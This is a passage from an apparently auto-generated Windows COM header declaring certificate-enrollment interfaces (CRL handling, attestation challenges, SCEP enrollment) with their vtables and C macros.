            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CRLNumber )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CRLNumber )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAVersion )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CAVersion )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ LONG pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BaseCRL )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509CertificateRevocationListVtbl;

    interface IX509CertificateRevocationList
    {
        CONST_VTBL struct IX509CertificateRevocationListVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRevocationList_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRevocationList_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRevocationList_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRevocationList_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRevocationList_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRevocationList_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRevocationList_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRevocationList_Initialize(This)	\
    ( (This)->lpVtbl -> Initialize(This) ) 

#define IX509CertificateRevocationList_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRevocationList_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRevocationList_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRevocationList_CheckPublicKeySignature(This,pPublicKey)	\
    ( (This)->lpVtbl -> CheckPublicKeySignature(This,pPublicKey) ) 

#define IX509CertificateRevocationList_CheckSignature(This)	\
    ( (This)->lpVtbl -> CheckSignature(This) ) 

#define IX509CertificateRevocationList_get_Issuer(This,ppValue)	\
    ( (This)->lpVtbl -> get_Issuer(This,ppValue) ) 

#define IX509CertificateRevocationList_put_Issuer(This,pValue)	\
    ( (This)->lpVtbl -> put_Issuer(This,pValue) ) 

#define IX509CertificateRevocationList_get_ThisUpdate(This,pValue)	\
    ( (This)->lpVtbl -> get_ThisUpdate(This,pValue) ) 

#define IX509CertificateRevocationList_put_ThisUpdate(This,Value)	\
    ( (This)->lpVtbl -> put_ThisUpdate(This,Value) ) 

#define IX509CertificateRevocationList_get_NextUpdate(This,pValue)	\
    ( (This)->lpVtbl -> get_NextUpdate(This,pValue) ) 

#define IX509CertificateRevocationList_put_NextUpdate(This,Value)	\
    ( (This)->lpVtbl -> put_NextUpdate(This,Value) ) 

#define IX509CertificateRevocationList_get_X509CRLEntries(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509CRLEntries(This,ppValue) ) 

#define IX509CertificateRevocationList_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRevocationList_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRevocationList_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRevocationList_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#define IX509CertificateRevocationList_get_CRLNumber(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_CRLNumber(This,Encoding,pValue) ) 

#define IX509CertificateRevocationList_put_CRLNumber(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_CRLNumber(This,Encoding,Value) ) 

#define IX509CertificateRevocationList_get_CAVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_CAVersion(This,pValue) ) 

#define IX509CertificateRevocationList_put_CAVersion(This,pValue)	\
    ( (This)->lpVtbl -> put_CAVersion(This,pValue) ) 

#define IX509CertificateRevocationList_get_BaseCRL(This,pValue)	\
    ( (This)->lpVtbl -> get_BaseCRL(This,pValue) ) 

#define IX509CertificateRevocationList_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRevocationList_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRevocationList_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRevocationList_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRevocationList_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRevocationList_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRevocationList_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509CertificateRevocationList_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRevocationList_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRevocationList_INTERFACE_DEFINED__ */


#ifndef __ICertificateAttestationChallenge_INTERFACE_DEFINED__
#define __ICertificateAttestationChallenge_INTERFACE_DEFINED__

/* interface ICertificateAttestationChallenge */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificateAttestationChallenge;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("6F175A7C-4A3A-40AE-9DBA-592FD6BBF9B8")
    ICertificateAttestationChallenge : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPendingFullCmcResponseWithChallenge) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE DecryptChallenge( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEnvelopedPkcs7ReencryptedToCA) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_RequestID( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrRequestID) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificateAttestationChallengeVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificateAttestationChallenge * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificateAttestationChallenge * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificateAttestationChallenge * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPendingFullCmcResponseWithChallenge);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *DecryptChallenge )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEnvelopedPkcs7ReencryptedToCA);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestID )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrRequestID);
        
        END_INTERFACE
    } ICertificateAttestationChallengeVtbl;

    interface ICertificateAttestationChallenge
    {
        CONST_VTBL struct ICertificateAttestationChallengeVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificateAttestationChallenge_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificateAttestationChallenge_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificateAttestationChallenge_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificateAttestationChallenge_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificateAttestationChallenge_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificateAttestationChallenge_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificateAttestationChallenge_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificateAttestationChallenge_Initialize(This,Encoding,strPendingFullCmcResponseWithChallenge)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strPendingFullCmcResponseWithChallenge) ) 

#define ICertificateAttestationChallenge_DecryptChallenge(This,Encoding,pstrEnvelopedPkcs7ReencryptedToCA)	\
    ( (This)->lpVtbl -> DecryptChallenge(This,Encoding,pstrEnvelopedPkcs7ReencryptedToCA) ) 

#define ICertificateAttestationChallenge_get_RequestID(This,pstrRequestID)	\
    ( (This)->lpVtbl -> get_RequestID(This,pstrRequestID) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificateAttestationChallenge_INTERFACE_DEFINED__ */


#ifndef __ICertificateAttestationChallenge2_INTERFACE_DEFINED__
#define __ICertificateAttestationChallenge2_INTERFACE_DEFINED__

/* interface ICertificateAttestationChallenge2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificateAttestationChallenge2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("4631334d-e266-47d6-bd79-be53cb2e2753")
    ICertificateAttestationChallenge2 : public ICertificateAttestationChallenge
    {
    public:
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_KeyContainerName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_KeyBlob( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificateAttestationChallenge2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificateAttestationChallenge2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificateAttestationChallenge2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificateAttestationChallenge2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPendingFullCmcResponseWithChallenge);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *DecryptChallenge )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEnvelopedPkcs7ReencryptedToCA);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestID )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrRequestID);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerName )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyBlob )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        END_INTERFACE
    } ICertificateAttestationChallenge2Vtbl;

    interface ICertificateAttestationChallenge2
    {
        CONST_VTBL struct ICertificateAttestationChallenge2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificateAttestationChallenge2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificateAttestationChallenge2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificateAttestationChallenge2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificateAttestationChallenge2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificateAttestationChallenge2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificateAttestationChallenge2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificateAttestationChallenge2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificateAttestationChallenge2_Initialize(This,Encoding,strPendingFullCmcResponseWithChallenge)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strPendingFullCmcResponseWithChallenge) ) 

#define ICertificateAttestationChallenge2_DecryptChallenge(This,Encoding,pstrEnvelopedPkcs7ReencryptedToCA)	\
    ( (This)->lpVtbl -> DecryptChallenge(This,Encoding,pstrEnvelopedPkcs7ReencryptedToCA) ) 

#define ICertificateAttestationChallenge2_get_RequestID(This,pstrRequestID)	\
    ( (This)->lpVtbl -> get_RequestID(This,pstrRequestID) ) 


#define ICertificateAttestationChallenge2_put_KeyContainerName(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerName(This,Value) ) 

#define ICertificateAttestationChallenge2_put_KeyBlob(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_KeyBlob(This,Encoding,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificateAttestationChallenge2_INTERFACE_DEFINED__ */


#ifndef __IX509SCEPEnrollment_INTERFACE_DEFINED__
#define __IX509SCEPEnrollment_INTERFACE_DEFINED__

/* interface IX509SCEPEnrollment */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509SCEPEnrollment;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab361-217d-11da-b2a4-000e7bbb2b09")
    IX509SCEPEnrollment : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IX509CertificateRequestPkcs10 *pRequest,
            /* [in] */ __RPC__in BSTR strThumbprint,
            /* [in] */ EncodingType ThumprintEncoding,
            /* [in] */ __RPC__in BSTR strServerCertificates,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeForPending( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CreateRequestMessage( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CreateRetrievePendingMessage( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CreateRetrieveCertificateMessage( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strIssuer,
            /* [in] */ EncodingType IssuerEncoding,
            /* [in] */ __RPC__in BSTR strSerialNumber,
            /* [defaultvalue][in] */ EncodingType SerialNumberEncoding,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ProcessResponseMessage( 
            /* [in] */ __RPC__in BSTR strResponse,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ServerCapabilities( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FailInfo( 
            /* [retval][out] */ __RPC__out X509SCEPFailInfo *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SignerCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_OldCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_OldCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TransactionId( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_TransactionId( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Request( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequestPkcs10 **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CertificateFriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_CertificateFriendlyName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Status( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE DeleteRequest( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509SCEPEnrollmentVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509SCEPEnrollment * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509SCEPEnrollment * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509SCEPEnrollment * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequestPkcs10 *pRequest,
            /* [in] */ __RPC__in BSTR strThumbprint,
            /* [in] */ EncodingType ThumprintEncoding,
            /* [in] */ __RPC__in BSTR strServerCertificates,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeForPending )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRequestMessage )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRetrievePendingMessage )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRetrieveCertificateMessage )( 
